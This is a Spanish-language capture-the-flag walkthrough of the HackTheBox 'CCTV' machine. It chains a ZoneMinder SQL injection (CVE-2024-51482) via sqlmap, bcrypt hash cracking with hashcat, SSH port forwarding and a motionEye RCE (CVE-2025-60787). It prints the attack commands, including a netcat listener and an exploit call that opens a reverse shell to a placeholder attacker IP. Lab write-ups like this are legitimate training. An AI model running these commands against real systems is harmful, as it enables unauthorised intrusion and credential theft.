
Recorrido de HackTheBox CCTV encadenando la inyección SQL de ZoneMinder CVE-2024-51482, el cracking de hash bcrypt y el RCE de motionEye CVE-2025-60787 para obtener root.
Plataforma: HackTheBox | SO: Linux
Inyección SQL en ZoneMinder mediante CVE-2024-51482 extrae un hash bcrypt de la base de datos. Crackearlo con hashcat proporciona acceso SSH. Una instancia interna de motionEye expuesta mediante redirección de puertos es vulnerable a CVE-2025-60787 — proporciona una shell de root.
nmap -sV -sC 10.129.53.160 -Pn
22/tcp open ssh OpenSSH 9.6p1 (Ubuntu)
80/tcp open http Apache 2.4.58 — SecureVision CCTV & Security Solutions
Se añadió cctv.htb a /etc/hosts. El puerto 80 alojaba una instalación de ZoneMinder.
CVE-2024-51482 es una vulnerabilidad de inyección SQL en el endpoint de inicio de sesión de ZoneMinder. El parámetro username no está sanitizado, lo que permite la extracción de la base de datos.
sqlmap -u "http://cctv.htb/zm/index.php" \
--data="username=admin&password=admin&action=login" \
--dbms=mysql --dump --batch
Se extrajo un hash de contraseña bcrypt de la tabla users.
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
Contraseña crackeada.
ssh <user>@10.129.53.160
User flag obtenida. Se comprobaron los servicios internos.
ss -tlnp
# 127.0.0.1:8765 — motionEye CCTV management panel
Se redirigió el puerto.
ssh -L 8765:127.0.0.1:8765 <user>@10.129.53.160
CVE-2025-60787 es un RCE autenticado en motionEye. Con acceso al panel interno, se ejecutan comandos arbitrarios como root.
nc -lvnp 4444
python3 exploit_CVE-2025-60787.py --url http://127.0.0.1:8765 --lhost <ATTACKER_IP> --lport 4444
Shell de root obtenida. Root flag en /root/root.txt.
Solo con fines educativos. Prueba únicamente sistemas que poseas o para los que tengas permiso explícito de prueba.